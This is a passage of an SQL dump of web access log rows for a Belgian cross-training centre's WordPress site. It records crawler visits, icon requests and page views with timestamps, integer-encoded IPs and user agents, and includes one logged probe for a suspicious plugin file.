(73012, 1495117344.679224, 783539426, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73013, 1495117345.268899, 783539426, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73014, 1495117345.789560, 783539426, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73015, 1495117346.360310, 783539426, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73016, 1495117346.824979, 783539426, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73017, 1495117347.274376, 783539426, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73018, 1495121398.261432, 2499535434, 0, 0, 0, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'AwarioRssBot/1.0 (+https://awario.com/bots.html; bots@awario.com)'),
(73019, 1495121403.376933, 2499535434, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/comments/feed/', '', 'AwarioRssBot/1.0 (+https://awario.com/bots.html; bots@awario.com)'),
(73020, 1495125386.063220, 532202074, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Windows NT 5.2; WOW64; x64) AppleWebKit/532.95.48 (KHTML, like Gecko) Chrome/57.4.0654.5926 Safari/534.55 OPR/44.6.1477.6749'),
(73021, 1495128609.600643, 2499535434, 0, 0, 0, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'AwarioRssBot/1.0 (+https://awario.com/bots.html; bots@awario.com)'),
(73022, 1495133716.873173, 1123633622, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(73023, 1495133717.372182, 1123633622, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(73024, 1495133810.705226, 1374841142, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/603.2.5 (KHTML, like Gecko)'),
(73025, 1495133811.198077, 1374841142, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(73026, 1495133811.641952, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(73027, 1495133812.094958, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(73028, 1495133812.601795, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(73029, 1495133813.043625, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(73030, 1495133813.764567, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(73031, 1495133814.829466, 1374841142, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_0 like Mac OS X) AppleWebKit/602.1.38 (KHTML, like Gecko) Version/10.0 Mobile/14A300 Safari/602.1'),
(73032, 1495133815.280712, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(73033, 1495133815.716987, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(73034, 1495133816.146150, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(73035, 1495133816.652685, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(73036, 1495133817.097921, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(73037, 1495133817.532615, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(73038, 1495133936.920188, 1374769563, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1'),
(73039, 1495133937.454361, 1374769563, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73040, 1495133937.922110, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73041, 1495133938.364263, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73042, 1495133938.822860, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73043, 1495133939.384822, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73044, 1495133939.951432, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73045, 1495133940.483045, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73046, 1495133941.074427, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73047, 1495133941.524868, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73048, 1495133942.006656, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73049, 1495134632.881274, 1374769563, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1'),
(73050, 1495134633.403884, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73051, 1495134633.870066, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73052, 1495134634.317954, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73053, 1495134634.782810, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73054, 1495134635.252839, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73055, 1495134635.818845, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73056, 1495134636.297490, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73057, 1495134636.773065, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73058, 1495134637.243135, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73059, 1495134637.993583, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73060, 1495138438.425787, 1374841142, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/603.2.5 (KHTML, like Gecko)'),
(73061, 1495138438.895857, 1374841142, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(73062, 1495138439.335300, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(73063, 1495138439.773901, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(73064, 1495138440.316440, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(73065, 1495138440.740117, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(73066, 1495138441.292887, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(73067, 1495138441.752096, 1374841142, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_0 like Mac OS X) AppleWebKit/602.1.38 (KHTML, like Gecko) Version/10.0 Mobile/14A300 Safari/602.1'),
(73068, 1495138442.179662, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(73069, 1495138442.714273, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(73070, 1495138443.250105, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(73071, 1495138443.846744, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(73072, 1495138444.348627, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(73073, 1495138444.857243, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(73074, 1495139431.873131, 2637637621, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/lequipe/', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(73075, 1495142875.450840, 1123633622, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(73076, 1495146475.957021, 676177735, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/contact/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(73077, 1495156535.665483, 1123633629, 0, 0, 1, 0, 1, 'https://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(73078, 1495156536.354706, 1123633629, 0, 1, 1, 0, 1, 'https://www.crosstrainingcenter.be/.well-known/apple-app-site-association', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(73079, 1495156537.478777, 1123633622, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(73080, 1495160215.099711, 1123633622, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(73081, 1495161348.961913, 2637637390, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(73082, 1495161349.141730, 2637637390, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(73083, 1495163274.211518, 1123633622, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(73084, 1495165995.214188, 1123631594, 0, 0, 1, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(73085, 1495165996.615481, 1123633622, 0, 0, 1, 0, 0, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(73086, 1495168137.341975, 1123633622, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(73087, 1495171504.467934, 1374769563, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1'),
(73088, 1495171505.049459, 1374769563, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73089, 1495171505.486861, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73090, 1495171505.928408, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73091, 1495171506.364806, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73092, 1495171506.886746, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73093, 1495171507.480615, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73094, 1495171508.004372, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73095, 1495171508.462142, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73096, 1495171508.925290, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73097, 1495171509.444920, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73098, 1495172705.117584, 1123633622, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(73099, 1495175425.877512, 1123633622, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(73100, 1495176647.154506, 1123633622, 0, 0, 1, 0, 0, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(73101, 1495184046.748663, 1323276251, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'https://www.google.fr/', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_1) AppleWebKit/602.2.14 (KHTML, like Gecko) Version/10.0.1 Safari/602.2.14'),
(73102, 1495184055.926777, 1323276251, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_1) AppleWebKit/602.2.14 (KHTML, like Gecko) Version/10.0.1 Safari/602.2.14'),
(73103, 1495184141.890385, 1323276251, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/contact/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_1) AppleWebKit/602.2.14 (KHTML, like Gecko) Version/10.0.1 Safari/602.2.14'),
(73104, 1495187379.547085, 3561526078, 0, 1, 0, 0, 1, 'http://crosstrainingcenter.be/wp-content/plugins/sfn.php', 'http://crosstrainingcenter.be/wp-content/plugins/sfn.php', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)'),
(73105, 1495188346.489533, 1123633622, 0, 0, 1, 0, 0, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(73106, 1495189808.907305, 1123633622, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; Google Web Preview Analytics) Chrome/41.0.2272.118 Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(73107, 1495189887.737702, 1123633622, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/contact/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(73108, 1495190188.030001, 1123633622, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/contact/feed/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(73109, 1495190249.571977, 2503517245, 0, 0, 0, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:48.0) Gecko/20100101 Firefox/48.0'),
(73110, 1495190661.195961, 2366145586, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)'),
(73111, 1495190665.560105, 2366145567, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)'),
(73112, 1495190804.859160, 1123633622, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(73113, 1495192636.013401, 1123633622, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(73114, 1495194767.665126, 1123633622, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/lequipe/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(73115, 1495197441.320372, 920718086, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 GTB6 (.NET CLR 3.5.30729)'),
(73116, 1495197837.930721, 1123633622, 0, 0, 1, 0, 0, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(73117, 1495198755.462089, 1123633622, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(73118, 1495200044.588557, 1439270754, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'https://www.google.be/', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36'),
(73119, 1495200046.048693, 1439270754, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/les-seances-namur/', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36'),
(73120, 1495200583.305026, 1123633622, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/notre-philosophie/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(73121, 1495200583.856818, 1123633622, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/notre-philosophie/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(73122, 1495202408.604203, 1123633622, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(73123, 1495210190.129856, 2499535434, 0, 0, 0, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'AwarioRssBot/1.0 (+https://awario.com/bots.html; bots@awario.com)'),
(73124, 1495210190.570883, 2499535434, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/comments/feed/', '', 'AwarioRssBot/1.0 (+https://awario.com/bots.html; bots@awario.com)'),
(73125, 1495212810.710486, 872366374, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/)'),
(73126, 1495212831.074845, 96753435, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/)'),
(73127, 1495217101.736910, 2637637526, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(73128, 1495217102.220911, 2637637526, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(73129, 1495217102.673453, 2637637526, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(73130, 1495217396.216119, 2499535434, 0, 0, 0, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'AwarioRssBot/1.0 (+https://awario.com/bots.html; bots@awario.com)'),
(73131, 1495220739.248196, 1123635091, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(73132, 1495220739.963158, 1123635091, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(73133, 1495227831.893519, 1374841142, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/603.2.5 (KHTML, like Gecko)'),
(73134, 1495227832.360700, 1374841142, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(73135, 1495227832.785570, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(73136, 1495227833.207622, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(73137, 1495227833.681542, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(73138, 1495227834.113854, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(73139, 1495227835.035691, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
